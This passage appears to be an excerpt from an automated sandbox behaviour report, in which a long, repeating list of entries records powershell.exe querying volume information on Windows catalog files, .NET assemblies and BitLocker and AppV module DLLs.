                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
